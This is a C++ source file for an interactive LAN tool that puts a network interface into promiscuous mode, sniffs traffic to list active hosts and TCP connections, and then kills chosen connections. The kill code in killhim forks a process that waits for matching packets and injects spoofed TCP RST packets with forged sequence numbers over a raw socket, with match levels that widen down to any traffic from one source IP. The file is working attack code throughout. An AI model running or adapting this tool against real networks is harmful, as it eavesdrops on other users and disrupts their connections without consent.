#include "tcpcc.h"

int stop;

/*
 * functions make ethernet device get promisc
 * and opens socket for futher listening
 */
int Tcpcc::initialize (char * dev_name, char * br, char * ma)	{

	unsigned long i;

	if (!strlen(dev_name)) strncpy(dev_name,"eth0",sizeof(ifr.ifr_name));
	
	strncpy(interface, dev_name, 16);
	strncpy(ifr.ifr_name,dev_name, sizeof(ifr.ifr_name));

	if((sockfd = socket(AF_INET,SOCK_PACKET, htons(ETHERTYPE_IP))) < 0)  {
   	perror("socket");
	   return -1;
		}

	if (!strlen(ma))	{
		if (ioctl (sockfd, SIOCGIFNETMASK, &ifr) < 0) {
	      perror ("get netmask");
			return -1;
			}
		memcpy( (void *)&i , (void *) (&ifr.ifr_netmask.sa_family +2), 4);
		netmask=ntohl(i);
		}
	else netmask = ntohl(inet_addr(ma));
	
   if (!strlen(br))	{
		if (ioctl (sockfd, SIOCGIFBRDADDR, &ifr) < 0) {
   		perror ("get broadcast\n");
			return -1;
			}
		memcpy((void *)&i, (void *) (&ifr.ifr_addr.sa_family +2),4);
		broadcast=ntohl(i);
		}
	else broadcast=ntohl(inet_addr(br));
		
  	if (ioctl (sockfd, SIOCGIFADDR, &ifr) < 0) {
		perror ("get ip\n");
		return -1;
	   }
	memcpy ((void *) &i, (void *) (&ifr.ifr_addr.sa_family + 2), 4); // (!) sa_family + 2 = sa_data (!) czemu tak nie dziala ?
   myip = ntohl (i);

	if (ioctl(sockfd, SIOCGIFFLAGS, &ifr)<0)  {
	   perror("get flags");
	   return -1;
	   }

	ifr.ifr_flags |= IFF_PROMISC;

	if (ioctl(sockfd, SIOCSIFFLAGS, &ifr)<0)  {
	   perror("set flags");
	   return -1;
	   };

// clearing structures...
return 0;
}

/*
 * gets info about active hosts in local network
 */
unsigned int Tcpcc::find_active (int timeout)	{

//	int n;
	unsigned int f;
	int tcp_offset=sizeof(struct iphdr)+ETHER_HEADER;
	char recvbuf [MAXPACKET];

	// zeruje wszystkie wpisy;
	for (f=0;f<ip_count;f++)	 (ips+f)->p_count=0;
	
	ip_count=0;
	temp_ips_count=0;
	
	alarm (timeout);
	signal (SIGALRM, sig_alarm);
	stop=0;

	ip = (struct iphdr *) (recvbuf+ETHER_HEADER);
	tcp = (struct tcphdr *) (recvbuf+tcp_offset);
	f=0;		
	
	while(stop==0)	{
		bzero(recvbuf, MAXPACKET);
	   recv(sockfd, recvbuf, sizeof(recvbuf), 0); // receive packet
		store_packet();
		f++;
		}		

//	store_packet();
	alarm(0);

	return f;
}

int Tcpcc::generate_ips_struct ()	{

	int found=0;
	unsigned int j=0,m=0;
	unsigned int i=0,g=0;
	unsigned long sa, da, sp, dp;

	for (g=0;g<temp_ips_count;g++)	{
		sa = ntohl((temp_ips+g)->ip);
		da = ntohl((temp_ips+g)->dests);
		sp = ntohs((temp_ips+g)->sports);
		dp = ntohs((temp_ips+g)->dports);
		found=0;
		i=0;

		if (sa>(myip&netmask)&&(sa<broadcast))	{
	
			while ((!found)&&(i<ip_count))	{ // sprawdza ip.
																					 
				if ((ips+i)->ip==sa)	{	//
					j=0;
					while ((!found)&&(j<(ips+i)->p_count))	{ // przeszukuje po portach
						if (((ips+i)->dests[j]==da)&&((ips+i)->sports[j]==sp)&&((ips+i)->dports[j]==dp))	 found=1; 
						j++;	
						}
				
					if (found==0)	{
						//powinno go dopisac w miejscu , j juz zinkrementowane
						(ips+i)->p_count++; 
						(ips+i)->sports[j]=sp;
						(ips+i)->dports[j]=dp;
						(ips+i)->dests[j]=da;
						found=1;
						m++;
						}
					} // znalazl wpis ip (if)
				i++;
				} // (while)
			if (found==0)	{ //jesli nie znalazl
				(ips+i)->ip=sa;
				(ips+i)->sports[0]=sp;
				(ips+i)->dports[0]=dp;
				(ips+i)->dests[0]=da;
				ip_count++;
				(ips+i)->p_count++;
				m++;
				}
			} // if source in my local net	
		}	 // (for)
return m;
}

/*
 * stores info about incoming packets... no sorting and placing 
 * for faster work
 */
void Tcpcc::store_packet ()	{
	
	if (temp_ips_count<MAX_TEMP_IPS)	{
		(temp_ips+temp_ips_count)->ip=ip->saddr;
		(temp_ips+temp_ips_count)->dests=ip->daddr;
		(temp_ips+temp_ips_count)->sports=tcp->source;
		(temp_ips+temp_ips_count)->dports=tcp->dest;
		temp_ips_count++;
		}
}
/*
 * translates structure of network ips to ascii char **
 */
void Tcpcc::translate (char src [LEFT_PANEL][255], char dst [RIGHT_PANEL][255], int *sc, int *dc, int index)	{
// index points to left panel object
	unsigned int i;
	struct in_addr adr;
	char temp [RIGHT_PANEL];	
	char port [30]="";
	
	for (i=0;i<ip_count;i++)	{ // left panel
		adr.s_addr=htonl((ips+i)->ip);
		snprintf(src[i],16,"%s",inet_ntoa(adr));
		}

	for (i=0;i<(ips+index)->p_count;i++)	{ //right panel
		memset(temp,' ',RIGHT_PANEL);
//		temp[LEFT_PANEL]='\0';
		adr.s_addr=htonl((ips+index)->dests[i]);
		snprintf(port,8," :%d",(ips+index)->sports[i]);
		memcpy(temp,port,strlen(port));
		snprintf(port,24,"%s:%d",inet_ntoa(adr),(ips+index)->dports[i]);
		memcpy(temp+9,port,strlen(port));
		memcpy(temp+30,"[   ]",5); // status.
		if ((ips+index)->status[i]==1)	
			temp[31]='K';
		temp[RIGHT_PANEL-1]='\0';
		snprintf(dst[i],RIGHT_PANEL,"%s",temp);
		//snprintf(dst[i],RIGHT_PANEL,"%s  %s:%d [   ]",(ips+index)->sports[i],inet_ntoa(adr),(ips+index)->dports[i]);
		}

	*sc = ip_count;
	*dc = (ips+index)->p_count;
}

/*
 * fork main process and prepare child to kill active lan connections at interactive mode
 */
int Tcpcc::prepare2killint (int cur_index, int dst_index, int timeout, int level)	{

   (ips+cur_index)->status[dst_index] = 1; // status killed;
			
	prepare2kill(htonl((ips+cur_index)->ip),htons((ips+cur_index)->sports[dst_index]),
		htonl((ips+cur_index)->dests[dst_index]),htons((ips+cur_index)->dports[dst_index]),
		timeout, level);

return 0;
}

int Tcpcc::prepare2kill (unsigned long src, unsigned int src_port, 
	unsigned long dst, unsigned int dst_port, int timeout, int level)	{

	int childpid;

	if ((childpid=fork())==-1) return -1;
	else if (childpid==0)  //fork done
		killhim(src, src_port, dst, dst_port, timeout, level);

return 0;	
}

/*
 * function waits for packets from src pointed to dst host
 * then RST flag is set and spooffed packet is send to src host
 */
int Tcpcc::killhim(unsigned long src, unsigned int src_port, 
   unsigned long dst, unsigned int dst_port, int timeout, int level)	{
	
	int sockfd, wsockfd;
	struct in_addr src_addr, dst_addr, tmp;
	struct ifreq ifr;
	char recvbuf [MAXPACKET];
	struct iphdr * kill_ip, *kill_fip;
	struct tcphdr * kill_tcp, *kill_ftcp;
	struct sockaddr_in mysock;
	char packet [MAXPACKET];
	int n=0, on=1;
	unsigned long lon;
	int ok=0;
	
   stop=0;
	signal(SIGALRM,sig_alarm);
	alarm(timeout);
						
	dst_addr.s_addr=dst;//htonl(dst);
	src_addr.s_addr=src;//htonl(src);
	
	bzero(packet, MAXPACKET);
	kill_fip=(struct iphdr *)packet;
	kill_ftcp=(struct tcphdr *)(packet+sizeof(*kill_fip));
	
	strncpy(ifr.ifr_name,interface, sizeof(ifr.ifr_name));

	if((sockfd = socket(AF_INET, SOCK_PACKET, htons(0x800))) < 0)  
		return -1;

	if (ioctl(sockfd, SIOCGIFFLAGS, &ifr)<0) 
		return -1;

	ifr.ifr_flags |= IFF_PROMISC;

	if (ioctl(sockfd, SIOCSIFFLAGS, &ifr)<0)
		return -1;

	if ((wsockfd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {// IPPROTO_TCP
		perror("socket");
		return -1;
	}

	if(setsockopt(wsockfd,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)  
		return -1;
	
	while (stop==0)	{
	   bzero(packet, MAXPACKET);
		n=recv(sockfd, recvbuf, sizeof(recvbuf), 0); // oczekuje na pakiet
		kill_ip = (struct iphdr *) (recvbuf + 0x0e ); // 0xe <- dlugosc naglowka ethernetu.
		kill_tcp = (struct tcphdr *) (recvbuf + 0x0e + sizeof(*kill_ip));
		switch(level)	{// checking kill level	
			case 0: // lowest kill strange all must match
				if ((dst_port==kill_tcp->dest) && 
					 (src==kill_ip->saddr) && 
					 (dst==kill_ip->daddr) && 
					 (src_port==kill_tcp->source) && 
					 (kill_tcp->rst==0)) ok=1;
				break;
			case 1: // no need for source port matching
				if ((dst_port==kill_tcp->dest) && 
					 (src==kill_ip->saddr) && 
					 (dst==kill_ip->daddr) && 
					 (kill_tcp->rst==0)) 
					 ok=1;
				break;
			case 2: // no need for source and dest port matching
				if ((src==kill_ip->saddr) &&
					 (dst==kill_ip->daddr)	&&
					 (kill_tcp->rst==0)) ok=1;
				break;
			case 3: //no need source port and destination ip
				if ((src==kill_ip->saddr) &&
					 (dst_port==kill_tcp->dest) &&
					 (kill_tcp->rst==0)) ok=1;
				dst_addr.s_addr=kill_ip->daddr;
				break;	 
			case 4: // check only whether source ip match
				if ((src==kill_ip->saddr)	&&
					 (kill_tcp->rst==0)) ok=1;
				dst_addr.s_addr=kill_ip->daddr;
				break;
			default:
				ok=0;
			}
//		printf("\n%x=%x %x=%x %x=%x %x=%x",htons(dst_port),kill_tcp->dest,htonl(src),kill_ip->saddr,htonl(dst),kill_ip->daddr,htons(src_port),kill_tcp->source);

		if (ok)	{
			// proceed killing 
			kill_ftcp->rst=1;
			kill_ftcp->ack=1;
			kill_ftcp->seq=kill_tcp->ack_seq;//htonl(lon);
			lon=ntohl(kill_tcp->seq)+1;//+sizeof(struct iphdr);
			kill_ftcp->ack_seq=htonl(lon); // ack
			kill_ftcp->source=kill_tcp->dest;
			kill_ftcp->dest=kill_tcp->source;
			kill_ftcp->doff=5;
			kill_ftcp->window=0;//tcp->window;//htons(32767);
			kill_ftcp->check=tcp_checksum((u16*)kill_ftcp, sizeof(struct tcphdr), dst_addr, src_addr);

			kill_fip->ihl=kill_ip->ihl;
			kill_fip->version=kill_ip->version;
			kill_fip->tos=0x00;//ip->tos; // 1 oktet
			kill_fip->tot_len=htons(sizeof(struct tcphdr)+sizeof(struct iphdr)); // nie wiem czemu nie widac w tcpdump
			kill_fip->id=htons(0x6);//htons(ntohs(ip->id)+1); // dwa oktety
			kill_fip->saddr=kill_ip->daddr;
			kill_fip->daddr=kill_ip->saddr;
			kill_fip->protocol=kill_ip->protocol;
			kill_fip->ttl=0x77;//ip->ttl;
			kill_fip->frag_off=htons(0x00);//ip->frag_off;
			kill_fip->check=checksum((u16*)kill_fip, sizeof(struct iphdr) );

			mysock.sin_family=AF_INET;
		   mysock.sin_port=kill_ftcp->dest;//htons(dst_port);
			tmp.s_addr=ntohl(kill_fip->daddr);
			mysock.sin_addr=tmp;//dst_addr;
					
	      memcpy(packet,kill_fip,sizeof(*kill_fip));
	      memcpy(packet+sizeof(struct iphdr),kill_ftcp,sizeof(struct tcphdr));

			if (sendto(wsockfd, packet, (sizeof(*kill_fip)+sizeof(*kill_ftcp)), 0x0, 
					(struct sockaddr*) &mysock, sizeof(mysock))<0) 
				return -1;
				
			ok=0;
			}
		}
	close(sockfd);
	close(wsockfd);
	alarm(0);
	exit (0); // terminating process
}

void sig_alarm(int)	{
stop=1;
}


u16 Tcpcc::tcp_checksum(u16 *ptr, int n, struct in_addr s, struct in_addr d)
{
// function counts checksum for TCP header
// the problem is, we have to create 12-byte pseudoheader...

struct pseudohdr {
struct in_addr source;     // source address
struct in_addr dest;    // destination address
unsigned char zero;     // 8bit zero
unsigned char proto;    // protocol
unsigned short len;     // length
} pseudohdr;

u_char *packet;
u16 answer = 0;

pseudohdr.source = s;
pseudohdr.dest = d;
pseudohdr.zero = 0;
pseudohdr.proto = IPPROTO_TCP;
pseudohdr.len = htons(n);

packet = new unsigned char [sizeof(pseudohdr)+n];//malloc(sizeof(pseudohdr) + n);

// 'construct' our packet
memcpy(packet,&pseudohdr,sizeof(pseudohdr));
memcpy((packet + sizeof(pseudohdr)), ptr,n);

//answer = (u16)in_cksum((u16 *)packet,(n+sizeof(pseudohdr)) );
answer = checksum((u16 *)packet,(n+sizeof(pseudohdr)) );

delete packet;//free(packet);

return answer;
}


u16 Tcpcc::checksum(u16 *ptr, int n)
{
// functions calculates IP checksum
// it can be used both for IP and TCP header checksum

u32 sum;
u16 oddbyte;
u16 answer;

sum=0;

// count all words - ptr is 16bit, but n (counter) is 8, so n-=2;
while(n>1) {
sum += *ptr++;
n -=2;
}

if (n == 1) {
oddbyte = 0;
*((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
sum += oddbyte;
}


sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
sum += (sum >> 16);                     /* add carry */
answer = ~sum;          /* ones-complement, then truncate to 16 bits */
return(answer);

}

